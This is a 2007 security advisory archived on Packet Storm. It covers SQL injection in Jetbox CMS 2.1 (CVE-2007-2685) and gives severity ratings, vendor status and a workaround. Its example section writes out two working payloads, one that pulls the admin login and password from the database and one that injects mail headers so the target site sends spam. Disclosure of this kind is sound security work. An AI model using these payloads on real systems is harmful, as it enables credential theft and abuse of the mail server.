exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jetbox-sql.txt

jetbox-sql.txt
Posted May 22, 2007
Authored by Jesper Jurcenoks | Site netvigilance.com

Jetbox CMS version 2.1 suffers from multiple SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
advisories | CVE-2007-2685
SHA-256 | 6c4c41af2c2a3c2ae8e9c89231ec9061ae4911180c1675834198dea0735e9b0d

jetbox-sql.txt

Change Mirror Download
netVigilance Security Advisory #28
Jetbox CMS version 2.1 Multiple SQL Injection Vulnerabilities
Description:
Jetbox CMS is seriously tested on usability & has a professional intuitive interface. The system is role based, with workflow and module orientated. All content is fully separated from layout. It uses php & mysql.
A security problem in the product allows attackers to commit SQL injection.
External References:
Mitre CVE: CVE-2007-2685
NVD NIST: CVE-2007-2685
OSVDB: 34784
Summary:
Jetbox CMS seriously tested on usability & has a professional intuitive interface.
Successful exploitation requires PHP magic_quotes_gpc set to Off on the server.
Advisory URL:
http://www.netvigilance.com/advisory0028
Release Date:
05/21/2007
Severity:
Risk: High

CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Complete
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Confidentiality
CVSS Base Score: 6.8

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: SQL Injection.
SecureScout Testcase ID:
Vulnerable Systems:
Jetbox CMS version 2.1
Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents, sending anonymous emails to other recipients or acquire administrator's privileges.
Vendor:
Streamedge Consultancy & Development
Vendor Status:
Contact with the Vendor was established. The vendor refused to fix the issue and said that Jetbox is not maintained already. There is no official fix at the release of this Security Advisory.
Workaround:
In the php.ini file set magic_quotes_gpc = On.
Example:
SQL Injection Vulnerability 1
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23
REPLY:
...<b>Warning</b>: main([SQL INJECTION RESULT - ADMIN NAME]-[SQL INJECTION RESULT - ADMIN PASSWORD]): failed to open stream: No such file or directory in <b>[SERVER PATH][PRODUCT-DIRECTORY]index.php</b> on line <b>149</b><br />
...<b>Warning</b>: main(): Failed opening '[SQL INJECTION RESULT - ADMIN NAME]-[SQL INJECTION RESULT - ADMIN PASSWORD]' for inclusion (include_path='.;c:php4pear;./;[SERVER PATH][PRODUCT-DIRECTORY]/includes') in <b>[SERVER PATH][PRODUCT-DIRECTORY]index.php</b> on line <b>149</b><br />
SQL Injection Vulnerability 2
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressN@somedomain.com%0ASubject: Some Spam Subject%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23
REPLY:
Spam will be send from target site
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close